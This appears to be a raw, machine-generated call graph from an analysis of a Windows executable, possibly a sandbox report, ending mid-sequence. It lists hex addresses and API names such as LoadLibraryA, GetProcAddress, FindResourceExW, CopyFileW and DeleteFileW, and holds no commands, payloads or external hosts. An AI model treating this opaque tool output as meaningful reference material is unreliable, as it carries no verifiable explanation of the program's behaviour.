676e05 93347->93349 93350 614643 93347->93350 93351 60ce19 48 API calls 93348->93351 93500 65e822 93349->93500 93499 614300 335 API calls _memcpy_s 93350->93499 93358 6146e4 Mailbox 93351->93358 93354 676e11 93355 614739 Mailbox 93354->93355 93540 64cc5c 86 API calls 4 library calls 93354->93540 93355->93170 93357 614659 93357->93354 93357->93355 93357->93358 93440 656ff0 93358->93440 93449 604252 93358->93449 93455 646524 93358->93455 93458 64fa0c 93358->93458 93364 67df42 93363->93364 93367 61e253 93363->93367 93365 67df77 93364->93365 93366 67df59 TranslateAcceleratorW 93364->93366 93366->93367 93367->93170 93369 61dca3 93368->93369 93370 61dc71 93368->93370 93369->93170 93370->93369 93371 61dc96 IsDialogMessageW 93370->93371 93372 67dd1d GetClassLongW 93370->93372 93371->93369 93371->93370 93372->93370 93372->93371 93373->93170 93374->93149 93375->93153 93376->93157 93377->93170 93378->93170 93380 61f4ea 48 API calls 93379->93380 93381 60d818 93380->93381 93382 61f4ea 48 API calls 93381->93382 93383 60d826 93382->93383 93383->93201 93384->93201 93385->93201 93387 60ce28 __wsetenvp 93386->93387 93388 61ee75 48 API calls 93387->93388 93389 60ce50 _memcpy_s 93388->93389 93390 61f4ea 48 API calls 93389->93390 93391 60ce66 93390->93391 93391->93201 93392->93201 93393->93201 93394->93201 93395->93201 93396->93279 93397->93280 93399 611cf6 93398->93399 93401 611ba2 93398->93401 93399->93331 93400 611bae 93408 611bb9 93400->93408 93439 61c15c 48 API calls 93400->93439 93401->93400 93403 61f4ea 48 API calls 93401->93403 93404 6749c4 93403->93404 93405 61f4ea 48 API calls 93404->93405 93413 6749cf 93405->93413 93406 611c5d 93406->93331 93407 61f4ea 48 API calls 93409 611c9f 93407->93409 93408->93406 93408->93407 93410 611cb2 93409->93410 93438 602925 48 API calls 93409->93438 93410->93331 93412 61f4ea 48 API calls 93412->93413 93413->93400 93413->93412 93414->93331 93415->93288 93416->93326 93417->93331 93418->93345 93419->93304 93420->93327 93421->93335 93422->93341 93423->93343 93427 60bc84 93424->93427 93425 61f4ea 48 API calls 93426 60bc97 93425->93426 93426->93341 93427->93425 93428->93331 93429->93331 93430->93331 93431->93328 93432->93345 93433->93345 93434->93324 93435->93345 93436->93345 93437->93331 93438->93410 93439->93408 93541 60936c 93440->93541 93442 65702a 93561 60b470 93442->93561 93444 65703a 93445 65705f 93444->93445 93446 60fe30 335 API calls 93444->93446 93448 657063 93445->93448 93589 60cdb9 48 API calls 93445->93589 93446->93445 93448->93355 93450 60425c 93449->93450 93452 604263 93449->93452 93616 6235e4 93450->93616 93453 604272 93452->93453 93454 604283 FreeLibrary 93452->93454 93453->93355 93454->93453 93915 646ca9 GetFileAttributesW 93455->93915 93459 64fa1c __ftell_nolock 93458->93459 93460 64fa44 93459->93460 94007 60d286 48 API calls 93459->94007 93462 60936c 81 API calls 93460->93462 93463 64fa5e 93462->93463 93464 64fa80 93463->93464 93465 64fb68 93463->93465 93475 64fb92 93463->93475 93466 60936c 81 API calls 93464->93466 93919 6041a9 93465->93919 93473 64fa8c _wcscpy _wcschr 93466->93473 93469 64fb8e 93470 60936c 81 API calls 93469->93470 93469->93475 93472 64fbc7 93470->93472 93471 6041a9 136 API calls 93471->93469 93943 621dfc 93472->93943 93478 64fab0 _wcscat _wcscpy 93473->93478 93482 64fade _wcscat 93473->93482 93475->93355 93476 60936c 81 API calls 93477 64fafc _wcscpy 93476->93477 94008 6472cb GetFileAttributesW 93477->94008 93479 60936c 81 API calls 93478->93479 93479->93482 93481 60936c 81 API calls 93484 64fb48 93481->93484 93482->93476 93483 64fb1c __wsetenvp 93483->93475 93483->93481 94009 6460dd 77 API calls 4 library calls 93484->94009 93485 64fbeb _wcscat _wcscpy 93487 60936c 81 API calls 93485->93487 93489 64fc82 93487->93489 93488 64fb5c 93488->93475 93946 64690b 93489->93946 93491 64fca2 93492 646524 3 API calls 93491->93492 93493 64fcb1 93492->93493 93494 60936c 81 API calls 93493->93494 93497 64fce2 93493->93497 93495 64fccb 93494->93495 93952 64bfa4 93495->93952 93498 604252 84 API calls 93497->93498 93498->93475 93499->93357 93501 65e84e 93500->93501 93502 65e868 93500->93502 94297 64cc5c 86 API calls 4 library calls 93501->94297 94298 65ccdc 48 API calls 93502->94298 93505 65e871 93506 60fe30 334 API calls 93505->93506 93507 65e8cf 93506->93507 93508 65e96a 93507->93508 93509 65e916 93507->93509 93539 65e860 Mailbox 93507->93539 93510 65e978 93508->93510 93514 65e9c7 93508->93514 94299 649b72 48 API calls 93509->94299 94300 64a69d 48 API calls 93510->94300 93513 65e949 93516 6145e0 334 API calls 93513->93516 93517 60936c 81 API calls 93514->93517 93514->93539 93515 65e99b 93518 60bc74 48 API calls 93515->93518 93516->93539 93519 65e9e1 93517->93519 93520 65e9a3 Mailbox 93518->93520 93521 60bdfa 48 API calls 93519->93521 93524 613200 334 API calls 93520->93524 93522 65ea05 CharUpperBuffW 93521->93522 93523 65ea1f 93522->93523 93525 65ea26 93523->93525 93526 65ea72 93523->93526 93524->93539 94301 649b72 48 API calls 93525->94301 93527 60936c 81 API calls 93526->93527 93528 65ea7a 93527->93528 94302 601caa 49 API calls 93528->94302 93531 65ea54 93532 6145e0 334 API calls 93531->93532 93532->93539 93533 65ea84 93534 60936c 81 API calls 93533->93534 93533->93539 93535 65ea9f 93534->93535 93536 60bc74 48 API calls 93535->93536 93537 65eaaf 93536->93537 93538 613200 334 API calls 93537->93538 93538->93539 93539->93354 93540->93355 93542 609384 93541->93542 93559 609380 93541->93559 93543 674cbd __i64tow 93542->93543 93544 674bbf 93542->93544 93545 609398 93542->93545 93552 6093b0 __itow Mailbox _wcscpy 93542->93552 93546 674ca5 93544->93546 93547 674bc8 93544->93547 93590 62172b 80 API calls 3 library calls 93545->93590 93591 62172b 80 API calls 3 library calls 93546->93591 93547->93552 93553 674be7 93547->93553 93549 61f4ea 48 API calls 93551 6093ba 93549->93551 93555 60ce19 48 API calls 93551->93555 93551->93559 93552->93549 93554 61f4ea 48 API calls 93553->93554 93556 674c04 93554->93556 93555->93559 93557 61f4ea 48 API calls 93556->93557 93558 674c2a 93557->93558 93558->93559 93560 60ce19 48 API calls 93558->93560 93559->93442 93560->93559 93592 606b0f 93561->93592 93563 60b69b 93603 60ba85 93563->93603 93565 60b6b5 Mailbox 93565->93444 93568 67397b 93614 6426bc 88 API calls 4 library calls 93568->93614 93569 60ba85 48 API calls 93582 60b495 93569->93582 93572 60b9e4 93615 6426bc 88 API calls 4 library calls 93572->93615 93573 673973 93573->93565 93576 60bcce 48 API calls 93576->93582 93577 673989 93578 60ba85 48 API calls 93577->93578 93578->93573 93579 673909 93581 606b4a 48 API calls 93579->93581 93584 673914 93581->93584 93582->93563 93582->93568 93582->93569 93582->93572 93582->93576 93582->93579 93583 60bc74 48 API calls 93582->93583 93585 60bdfa 48 API calls 93582->93585 93588 673939 _memcpy_s 93582->93588 93597 60c413 59 API calls 93582->93597 93598 60bb85 93582->93598 93611 60c6a5 49 API calls 93582->93611 93612 60c799 48 API calls _memcpy_s 93582->93612 93583->93582 93587 61f4ea 48 API calls 93584->93587 93586 60b66c CharUpperBuffW 93585->93586 93586->93582 93587->93588 93613 6426bc 88 API calls 4 library calls 93588->93613 93589->93448 93590->93552 93591->93552 93593 61f4ea 48 API calls 93592->93593 93594 606b34 93593->93594 93595 606b4a 48 API calls 93594->93595 93596 606b43 93595->93596 93596->93582 93597->93582 93599 60bb9b 93598->93599 93602 60bb96 _memcpy_s 93598->93602 93600 61ee75 48 API calls 93599->93600 93601 671b77 93599->93601 93600->93602 93601->93601 93602->93582 93604 60bb25 93603->93604 93607 60ba98 _memcpy_s 93603->93607 93606 61f4ea 48 API calls 93604->93606 93605 61f4ea 48 API calls 93609 60ba9f 93605->93609 93606->93607 93607->93605 93608 60bac8 93608->93565 93609->93608 93610 61f4ea 48 API calls 93609->93610 93610->93608 93611->93582 93612->93582 93613->93573 93614->93577 93615->93573 93617 6235f0 _wprintf 93616->93617 93618 623604 93617->93618 93619 62361c 93617->93619 93651 627c0e 47 API calls __getptd_noexit 93618->93651 93626 623614 _wprintf 93619->93626 93629 624e1c 93619->93629 93622 623609 93652 626e10 8 API calls __cftof2_l 93622->93652 93626->93452 93630 624e4e EnterCriticalSection 93629->93630 93631 624e2c 93629->93631 93633 62362e 93630->93633 93631->93630 93632 624e34 93631->93632 93654 627cf4 93632->93654 93635 623578 93633->93635 93636 623587 93635->93636 93637 62359b 93635->93637 93732 627c0e 47 API calls __getptd_noexit 93636->93732 93640 623597 93637->93640 93692 622c84 93637->93692 93639 62358c 93733 626e10 8 API calls __cftof2_l 93639->93733 93653 623653 LeaveCriticalSection LeaveCriticalSection _fprintf 93640->93653 93647 6235b5 93709 62e9d2 93647->93709 93649 6235bb 93649->93640 93650 621c9d _free 47 API calls 93649->93650 93650->93640 93651->93622 93652->93626 93653->93626 93655 627d05 93654->93655 93656 627d18 EnterCriticalSection 93654->93656 93661 627d7c 93655->93661 93656->93633 93658 627d0b 93658->93656 93685 62115b 47 API calls 3 library calls 93658->93685 93662 627d88 _wprintf 93661->93662 93663 627d91 93662->93663 93664 627da9 93662->93664 93686 6281c2 47 API calls 2 library calls 93663->93686 93668 627e11 _wprintf 93664->93668 93679 627da7 93664->93679 93667 627d96 93687 62821f 47 API calls 8 library calls 93667->93687 93668->93658 93669 627dbd 93671 627dd3 93669->93671 93672 627dc4 93669->93672 93675 627cf4 __lock 46 API calls 93671->93675 93690 627c0e 47 API calls __getptd_noexit 93672->93690 93673 627d9d 93688 621145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93673->93688 93678 627dda 93675->93678 93677 627dc9 93677->93668 93680 627de9 InitializeCriticalSectionAndSpinCount 93678->93680 93681 627dfe 93678->93681 93679->93664 93689 6269d0 47 API calls std::exception::_Copy_str 93679->93689 93682 627e04 93680->93682 93683 621c9d _free 46 API calls 93681->93683 93691 627e1a LeaveCriticalSection _doexit 93682->93691 93683->93682 93686->93667 93687->93673 93689->93669 93690->93677 93691->93668 93693 622c97 93692->93693 93694 622cbb 93692->93694 93693->93694 93695 622933 __fseek_nolock 47 API calls 93693->93695 93698 62eb36 93694->93698 93696 622cb4 93695->93696 93734 62af61 93696->93734 93699 62eb43 93698->93699 93701 6235af 93698->93701 93700 621c9d _free 47 API calls 93699->93700 93699->93701 93700->93701 93702 622933 93701->93702 93703 622952 93702->93703 93704 62293d 93702->93704 93703->93647 93871 627c0e 47 API calls __getptd_noexit 93704->93871 93706 622942 93872 626e10 8 API calls __cftof2_l 93706->93872 93708 62294d 93708->93647 93710 62e9de _wprintf 93709->93710 93711 62e9e6 93710->93711 93712 62e9fe 93710->93712 93888 627bda 47 API calls __getptd_noexit 93711->93888 93714 62ea7b 93712->93714 93719 62ea28 93712->93719 93892 627bda 47 API calls __getptd_noexit 93714->93892 93715 62e9eb 93889 627c0e 47 API calls __getptd_noexit 93715->93889 93718 62ea80 93893 627c0e 47 API calls __getptd_noexit 93718->93893 93721 62a8ed ___lock_fhandle 49 API calls 93719->93721 93723 62ea2e 93721->93723 93722 62ea88 93894 626e10 8 API calls __cftof2_l 93722->93894 93725 62ea41 93723->93725 93726 62ea4c 93723->93726 93873 62ea9c 93725->93873 93890 627c0e 47 API calls __getptd_noexit 93726->93890 93729 62ea47 93891 62ea73 LeaveCriticalSection __unlock_fhandle 93729->93891 93730 62e9f3 _wprintf 93730->93649 93732->93639 93733->93640 93735 62af6d _wprintf 93734->93735 93736 62af75 93735->93736 93737 62af8d 93735->93737 93832 627bda 47 API calls __getptd_noexit 93736->93832 93739 62b022 93737->93739 93744 62afbf 93737->93744 93837 627bda 47 API calls __getptd_noexit 93739->93837 93740 62af7a 93833 627c0e 47 API calls __getptd_noexit 93740->93833 93743 62b027 93838 627c0e 47 API calls __getptd_noexit 93743->93838 93759 62a8ed 93744->93759 93747 62b02f 93839 626e10 8 API calls __cftof2_l 93747->93839 93748 62afc5 93750 62afeb 93748->93750 93751 62afd8 93748->93751 93834 627c0e 47 API calls __getptd_noexit 93750->93834 93768 62b043 93751->93768 93753 62af82 _wprintf 93753->93694 93755 62aff0 93835 627bda 47 API calls __getptd_noexit 93755->93835 93756 62afe4 93836 62b01a LeaveCriticalSection __unlock_fhandle 93756->93836 93760 62a8f9 _wprintf 93759->93760 93761 62a946 EnterCriticalSection 93760->93761 93762 627cf4 __lock 47 API calls 93760->93762 93763 62a96c _wprintf 93761->93763 93764 62a91d 93762->93764 93763->93748 93765 62a93a 93764->93765 93766 62a928 InitializeCriticalSectionAndSpinCount 93764->93766 93840 62a970 LeaveCriticalSection _doexit 93765->93840 93766->93765 93769 62b050 __ftell_nolock 93768->93769 93770 62b0ac 93769->93770 93771 62b08d 93769->93771 93799 62b082 93769->93799 93775 62b105 93770->93775 93776 62b0e9 93770->93776 93850 627bda 47 API calls __getptd_noexit 93771->93850 93774 62b092 93851 627c0e 47 API calls __getptd_noexit 93774->93851 93779 62b11c 93775->93779 93856 62f82f 49 API calls 3 library calls 93775->93856 93853 627bda 47 API calls __getptd_noexit 93776->93853 93777 62b86b 93777->93756 93841 633bf2 93779->93841 93781 62b099 93852 626e10 8 API calls __cftof2_l 93781->93852 93784 62b0ee 93854 627c0e 47 API calls __getptd_noexit 93784->93854 93786 62b12a 93788 62b44b 93786->93788 93857 627a0d 47 API calls 2 library calls 93786->93857 93790 62b463 93788->93790 93791 62b7b8 WriteFile 93788->93791 93789 62b0f5 93855 626e10 8 API calls __cftof2_l 93789->93855 93795 62b55a 93790->93795 93803 62b479 93790->93803 93793 62b7e1 GetLastError 93791->93793 93801 62b410 93791->93801 93793->93801 93806 62b663 93795->93806 93809 62b565 93795->93809 93796 62b150 GetConsoleMode 93796->93788 93798 62b189 93796->93798 93797 62b81b 93797->93799 93862 627c0e 47 API calls __getptd_noexit 93797->93862 93798->93788 93802 62b199 GetConsoleCP 93798->93802 93864 62a70c 93799->93864 93801->93797 93801->93799 93808 62b7f7 93801->93808 93802->93801 93826 62b1c2 93802->93826 93803->93797 93804 62b4e9 WriteFile 93803->93804 93804->93793 93805 62b526 93804->93805 93805->93801 93805->93803 93815 62b555 93805->93815 93806->93797 93810 62b6d8 WideCharToMultiByte 93806->93810 93807 62b843 93863 627bda 47 API calls __getptd_noexit 93807->93863 93812 62b812 93808->93812 93813 62b7fe 93808->93813 93809->93797 93814 62b5de WriteFile 93809->93814 93810->93793 93824 62b71f 93810->93824 93861 627bed 47 API calls 3 library calls 93812->93861 93859 627c0e 47 API calls __getptd_noexit 93813->93859 93814->93793 93818 62b62d 93814->93818 93815->93801 93818->93801 93818->93809 93818->93815 93819 62b727 WriteFile 93822 62b77a GetLastError 93819->93822 93819->93824 93820 62b803 93860 627bda 47 API calls __getptd_noexit 93820->93860 93822->93824 93824->93801 93824->93806 93824->93815 93824->93819 93825 635884 WriteConsoleW CreateFileW __chsize_nolock 93830 62b2f6 93825->93830 93826->93801 93827 6340f7 59 API calls __chsize_nolock 93826->93827 93828 62b28f WideCharToMultiByte 93826->93828 93826->93830 93858 621688 57 API calls __isleadbyte_l 93826->93858 93827->93826 93828->93801 93829 62b2ca WriteFile 93828->93829 93829->93793 93829->93830 93830->93793 93830->93801 93830->93825 93830->93826 93831 62b321 WriteFile 93830->93831 93831->93793 93831->93830 93832->93740 93833->93753 93834->93755 93835->93756 93836->93753 93837->93743 93838->93747 93839->93753 93840->93761 93842 633c0a 93841->93842 93843 633bfd 93841->93843 93846 633c16 93842->93846 93847 627c0e __cftof2_l 47 API calls 93842->93847 93844 627c0e __cftof2_l 47 API calls 93843->93844 93845 633c02 93844->93845 93845->93786 93846->93786 93848 633c37 93847->93848 93849 626e10 __cftof2_l 8 API calls 93848->93849 93849->93845 93850->93774 93851->93781 93852->93799 93853->93784 93854->93789 93855->93799 93856->93779 93857->93796 93858->93826 93859->93820 93860->93799 93861->93799 93862->93807 93863->93799 93865 62a716 IsProcessorFeaturePresent 93864->93865 93866 62a714 93864->93866 93868 6337b0 93865->93868 93866->93777 93869 63375f ___raise_securityfailure 5 API calls 93868->93869 93870 633893 93869->93870 93870->93777 93871->93706 93872->93708 93895 62aba4 93873->93895 93875 62eb00 93908 62ab1e 48 API calls 2 library calls 93875->93908 93876 62eaaa 93876->93875 93879 62aba4 __lseeki64_nolock 47 API calls 93876->93879 93887 62eade 93876->93887 93878 62eb08 93884 62eb2a 93878->93884 93909 627bed 47 API calls 3 library calls 93878->93909 93881 62ead5 93879->93881 93880 62aba4 __lseeki64_nolock 47 API calls 93882 62eaea CloseHandle 93880->93882 93885 62aba4 __lseeki64_nolock 47 API calls 93881->93885 93882->93875 93886 62eaf6 GetLastError 93882->93886 93884->93729 93885->93887 93886->93875 93887->93875 93887->93880 93888->93715 93889->93730 93890->93729 93891->93730 93892->93718 93893->93722 93894->93730 93896 62abaf 93895->93896 93898 62abc4 93895->93898 93910 627bda 47 API calls __getptd_noexit 93896->93910 93902 62abe9 93898->93902 93912 627bda 47 API calls __getptd_noexit 93898->93912 93899 62abb4 93911 627c0e 47 API calls __getptd_noexit 93899->93911 93902->93876 93903 62abf3 93913 627c0e 47 API calls __getptd_noexit 93903->93913 93904 62abbc 93904->93876 93906 62abfb 93914 626e10 8 API calls __cftof2_l 93906->93914 93908->93878 93909->93884 93910->93899 93911->93904 93912->93903 93913->93906 93914->93904 93916 646529 93915->93916 93917 646cc4 FindFirstFileW 93915->93917 93916->93355 93917->93916 93918 646cd9 FindClose 93917->93918 93918->93916 94010 604214 93919->94010 93924 674f73 93926 604252 84 API calls 93924->93926 93925 6041d4 LoadLibraryExW 94020 604291 93925->94020 93928 674f7a 93926->93928 93930 604291 3 API calls 93928->93930 93932 674f82 93930->93932 94046 6044ed 93932->94046 93933 6041fb 93933->93932 93934 604207 93933->93934 93935 604252 84 API calls 93934->93935 93937 60420c 93935->93937 93937->93469 93937->93471 93940 674fa9 94054 604950 93940->94054 94229 621e46 93943->94229 93947 646918 _wcschr __ftell_nolock 93946->93947 93948 64692e _wcscat _wcscpy 93947->93948 93949 621dfc __wsplitpath 47 API calls 93947->93949 93948->93491 93950 64695d 93949->93950 93951 621dfc __wsplitpath 47 API calls 93950->93951 93951->93948 93953 64bfb1 __ftell_nolock 93952->93953 93954 61f4ea 48 API calls 93953->93954 93955 64c00e 93954->93955 93956 6047b7 48 API calls 93955->93956 93957 64c018 93956->93957 93958 64bdb4 GetSystemTimeAsFileTime 93957->93958 93959 64c023 93958->93959 93960 604517 83 API calls 93959->93960 93961 64c036 _wcscmp 93960->93961 93962 64c107 93961->93962 93963 64c05a 93961->93963 93964 64c56d 94 API calls 93962->93964 94272 64c56d 93963->94272 93980 64c0d3 _wcscat 93964->93980 93967 621dfc __wsplitpath 47 API calls 93972 64c088 _wcscat _wcscpy 93967->93972 93968 6044ed 64 API calls 93970 64c12c 93968->93970 93969 64c110 93969->93497 93971 6044ed 64 API calls 93970->93971 93973 64c13c 93971->93973 93975 621dfc __wsplitpath 47 API calls 93972->93975 93974 6044ed 64 API calls 93973->93974 93976 64c157 93974->93976 93975->93980 93977 6044ed 64 API calls 93976->93977 93978 64c167 93977->93978 93979 6044ed 64 API calls 93978->93979 93981 64c182 93979->93981 93980->93968 93980->93969 93982 6044ed 64 API calls 93981->93982 93983 64c192 93982->93983 93984 6044ed 64 API calls 93983->93984 93985 64c1a2 93984->93985 93986 6044ed 64 API calls 93985->93986 93987 64c1b2 93986->93987 94255 64c71a GetTempPathW GetTempFileNameW 93987->94255 93989 64c1be 93990 623499 117 API calls 93989->93990 94000 64c1cf 93990->94000 93991 64c289 93992 6235e4 __fcloseall 83 API calls 93991->93992 93993 64c294 93992->93993 93995 64c2ae 93993->93995 93996 64c29a DeleteFileW 93993->93996 93994 6044ed 64 API calls 93994->94000 93997 64c342 CopyFileW 93995->93997 94002 64c2b8 93995->94002 93996->93969 94000->93969 94000->93991 94000->93994 94256 622aae 94000->94256 94278 64b965 118 API calls __fcloseall 94002->94278 94007->93460 94008->93483 94009->93488 94059 604339 94010->94059 94013 60423c 94015 604244 FreeLibrary 94013->94015 94016 6041bb 94013->94016 94015->94016 94017 623499 94016->94017 94067 6234ae 94017->94067 94019 6041c8 94019->93924 94019->93925 94146 6042e4 94020->94146 94023 6042b8 94025 6042c1 FreeLibrary 94023->94025 94026 6041ec 94023->94026 94025->94026 94027 604380 94026->94027 94028 61f4ea 48 API calls 94027->94028 94029 604395 94028->94029 94154 6047b7 94029->94154 94031 6043a1 _memcpy_s 94032 6043dc 94031->94032 94034 6044d1 94031->94034 94035 604499 94031->94035 94033 604950 57 API calls 94032->94033 94041 6043e5 94033->94041 94168 64c750 93 API calls 94034->94168 94157 60406b CreateStreamOnHGlobal 94035->94157 94038 6044ed 64 API calls 94038->94041 94040 604479 94040->93933 94041->94038 94041->94040 94042 674ed7 94041->94042 94163 604517 94041->94163 94043 604517 83 API calls 94042->94043 94044 674eeb 94043->94044 94045 6044ed 64 API calls 94044->94045 94045->94040 94047 674fc0 94046->94047 94048 6044ff 94046->94048 94186 62381e 94048->94186 94051 64bf5a 94206 64bdb4 94051->94206 94053 64bf70 94053->93940 94055 675002 94054->94055 94056 60495f 94054->94056 94211 623e65 94056->94211 94058 604967 94063 60434b 94059->94063 94062 604321 LoadLibraryA GetProcAddress 94062->94013 94064 60422f 94063->94064 94065 604354 LoadLibraryA 94063->94065 94064->94013 94064->94062 94065->94064 94066 604365 GetProcAddress 94065->94066 94066->94064 94068 6234ba _wprintf 94067->94068 94069 6234cd 94068->94069 94072 6234fe 94068->94072 94115 627c0e 47 API calls __getptd_noexit 94069->94115 94071 6234d2 94116 626e10 8 API calls __cftof2_l 94071->94116 94086 62e4c8 94072->94086 94075 623503 94076 623519 94075->94076 94077 62350c 94075->94077 94079 623543 94076->94079 94080 623523 94076->94080 94117 627c0e 47 API calls __getptd_noexit 94077->94117 94100 62e5e0 94079->94100 94118 627c0e 47 API calls __getptd_noexit 94080->94118 94082 6234dd _wprintf @_EH4_CallFilterFunc@8 94082->94019 94087 62e4d4 _wprintf 94086->94087 94088 627cf4 __lock 47 API calls 94087->94088 94089 62e4e2 94088->94089 94090 62e559 94089->94090 94095 627d7c __mtinitlocknum 47 API calls 94089->94095 94098 62e552 94089->94098 94123 624e5b 48 API calls __lock 94089->94123 94124 624ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94089->94124 94125 6269d0 47 API calls std::exception::_Copy_str 94090->94125 94093 62e560 94094 62e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94093->94094 94093->94098 94094->94098 94095->94089 94097 62e5cc _wprintf 94097->94075 94120 62e5d7 94098->94120 94108 62e600 __wopenfile 94100->94108 94101 62e61a 94130 627c0e 47 API calls __getptd_noexit 94101->94130 94103 62e61f 94131 626e10 8 API calls __cftof2_l 94103->94131 94105 62354e 94119 623570 LeaveCriticalSection LeaveCriticalSection _fprintf 94105->94119 94106 62e838 94127 6363c9 94106->94127 94108->94101 94114 62e7d5 94108->94114 94132 62185b 59 API calls 2 library calls 94108->94132 94110 62e7ce 94110->94114 94133 62185b 59 API calls 2 library calls 94110->94133 94112 62e7ed 94112->94114 94134 62185b 59 API calls 2 library calls 94112->94134 94114->94101 94114->94106 94115->94071 94116->94082 94117->94082 94118->94082 94119->94082 94126 627e58 LeaveCriticalSection 94120->94126 94122 62e5de 94122->94097 94123->94089 94124->94089 94125->94093 94126->94122 94135 635bb1 94127->94135 94129 6363e2 94129->94105 94130->94103 94131->94105 94132->94110 94133->94112 94134->94114 94138 635bbd _wprintf 94135->94138 94136 635bcf 94137 627c0e __cftof2_l 47 API calls 94136->94137 94139 635bd4 94137->94139 94138->94136 94140 635c06 94138->94140 94141 626e10 __cftof2_l 8 API calls 94139->94141 94142 635c78 __wsopen_helper 110 API calls 94140->94142 94145 635bde _wprintf 94141->94145 94143 635c23 94142->94143 94144 635c4c __wsopen_helper LeaveCriticalSection 94143->94144 94144->94145 94145->94129 94150 6042f6 94146->94150 94149 6042cc LoadLibraryA GetProcAddress 94149->94023 94151 6042aa 94150->94151 94152 6042ff LoadLibraryA 94150->94152 94151->94023 94151->94149 94152->94151 94153 604310 GetProcAddress 94152->94153 94153->94151 94155 61f4ea 48 API calls 94154->94155 94156 6047c9 94155->94156 94156->94031 94158 604085 FindResourceExW 94157->94158 94162 6040a2 94157->94162 94159 674f16 LoadResource 94158->94159 94158->94162 94160 674f2b SizeofResource 94159->94160 94159->94162 94161 674f3f LockResource 94160->94161 94160->94162 94161->94162 94162->94032 94164 604526 94163->94164 94165 674fe0 94163->94165 94169 623a8d 94164->94169 94167 604534 94167->94041 94168->94032 94171 623a99 _wprintf 94169->94171 94170 623aa7 94182 627c0e 47 API calls __getptd_noexit 94170->94182 94171->94170 94173 623acd 94171->94173 94175 624e1c __lock_file 48 API calls 94173->94175 94174 623aac 94183 626e10 8 API calls __cftof2_l 94174->94183 94177 623ad3 94175->94177 94184 6239fe 81 API calls 4 library calls 94177->94184 94179 623ae2 94185 623b04 LeaveCriticalSection LeaveCriticalSection _fprintf 94179->94185 94181 623ab7 _wprintf 94181->94167 94182->94174 94183->94181 94184->94179 94185->94181 94189 623839 94186->94189 94188 604510 94188->94051 94190 623845 _wprintf 94189->94190 94191 62385b _memset 94190->94191 94192 623888 94190->94192 94194 623880 _wprintf 94190->94194 94202 627c0e 47 API calls __getptd_noexit 94191->94202 94193 624e1c __lock_file 48 API calls 94192->94193 94195 62388e 94193->94195 94194->94188 94204 62365b 62 API calls 6 library calls 94195->94204 94198 623875 94203 626e10 8 API calls __cftof2_l 94198->94203 94199 6238a4 94205 6238c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94199->94205 94202->94198 94203->94194 94204->94199 94205->94194 94209 62344a GetSystemTimeAsFileTime 94206->94209 94208 64bdc3 94208->94053 94210 623478 __aulldiv 94209->94210 94210->94208 94212 623e71 _wprintf 94211->94212 94213 623e94 94212->94213 94214 623e7f 94212->94214 94215 624e1c __lock_file 48 API calls 94213->94215 94225 627c0e 47 API calls __getptd_noexit 94214->94225 94218 623e9a 94215->94218 94217 623e84 94226 626e10 8 API calls __cftof2_l 94217->94226 94227 623b0c 55 API calls 5 library calls 94218->94227 94221 623ea5 94228 623ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94221->94228 94223 623eb7 94224 623e8f _wprintf 94223->94224 94224->94058 94225->94217 94226->94224 94227->94221 94228->94223 94230 621e61 94229->94230 94233 621e55 94229->94233 94253 627c0e 47 API calls __getptd_noexit 94230->94253 94232 622019 94240 621e41 94232->94240 94254 626e10 8 API calls __cftof2_l 94232->94254 94233->94230 94236 621ed4 94233->94236 94248 629d6b 47 API calls __cftof2_l 94233->94248 94236->94230 94242 621f41 94236->94242 94249 629d6b 47 API calls __cftof2_l 94236->94249 94237 621fa0 94237->94230 94239 621fb0 94237->94239 94237->94240 94238 621f5f 94238->94230 94241 621f7b 94238->94241 94250 629d6b 47 API calls __cftof2_l 94238->94250 94252 629d6b 47 API calls __cftof2_l 94239->94252 94240->93485 94241->94230 94241->94240 94245 621f91 94241->94245 94242->94237 94242->94238 94251 629d6b 47 API calls __cftof2_l 94245->94251 94248->94236 94249->94242 94250->94241 94251->94240 94252->94240 94253->94232 94254->94240 94255->93989 94257 622aba _wprintf 94256->94257 94258 622ad4 94257->94258 94259 622aec 94257->94259 94260 622ae4 _wprintf 94257->94260 94291 627c0e 47 API calls __getptd_noexit 94258->94291 94261 624e1c __lock_file 48 API calls 94259->94261 94260->94000 94263 622af2 94261->94263 94279 622957 94263->94279 94264 622ad9 94292 626e10 8 API calls __cftof2_l 94264->94292 94277 64c581 __tzset_nolock _wcscmp 94272->94277 94273 6044ed 64 API calls 94273->94277 94274 64c05f 94274->93967 94274->93969 94275 64bf5a GetSystemTimeAsFileTime 94275->94277 94276 604517 83 API calls 94276->94277 94277->94273 94277->94274 94277->94275 94277->94276 94291->94264 94292->94260 94297->93539 94298->93505 94299->93513 94300->93515 94301->93531 94302->93533 94303->93234 94304->93234 94305->93230 94306->93230 94307->93229 94308->93224 94309->93239 94310->93251 94311->93251 94312->93245 94313->93268 94314 603742 94315 60374b 94314->94315 94316 6037c8 94315->94316 94317 603769 94315->94317 94355 6037c6 94315->94355 94319 671e00 94316->94319 94320 6037ce 94316->94320 94321 603776 94317->94321 94322 60382c PostQuitMessage 94317->94322 94318 6037ab DefWindowProcW 94344 6037b9 94318->94344 94369 602ff6 16 API calls 94319->94369 94323 6037d3 94320->94323 94324 6037f6 SetTimer RegisterWindowMessageW 94320->94324 94326 603781 94321->94326 94327 671e88 94321->94327 94322->94344 94332 671da3 94323->94332 94333 6037da KillTimer 94323->94333 94328 60381f CreatePopupMenu 94324->94328 94324->94344 94329 603836 94326->94329 94330 603789 94326->94330 94384 644ddd 60 API calls _memset 94327->94384 94328->94344 94359 61eb83 94329->94359 94336 603794 94330->94336 94348 671e6d 94330->94348 94338 671ddc MoveWindow 94332->94338 94339 671da8 94332->94339 94366 603847 Shell_NotifyIconW _memset 94333->94366 94334 671e27 94370 61e312 335 API calls Mailbox 94334->94370 94341 60379f 94336->94341 94342 671e58 94336->94342 94338->94344 94345 671dac 94339->94345 94346 671dcb SetFocus 94339->94346 94341->94318 94371 603847 Shell_NotifyIconW _memset 94341->94371 94382 6455bd 70 API calls _memset 94342->94382 94343 671e9a 94343->94318 94343->94344 94345->94341 94349 671db5 94345->94349 94346->94344 94347 6037ed 94367 60390f DeleteObject DestroyWindow Mailbox 94347->94367 94348->94318 94383 63a5f3 48 API calls 94348->94383 94368 602ff6 16 API calls 94349->94368 94354 671e68 94354->94344 94355->94318 94357 671e4c 94372 604ffc 94357->94372 94360 61eb9a _memset 94359->94360 94361 61ec1c 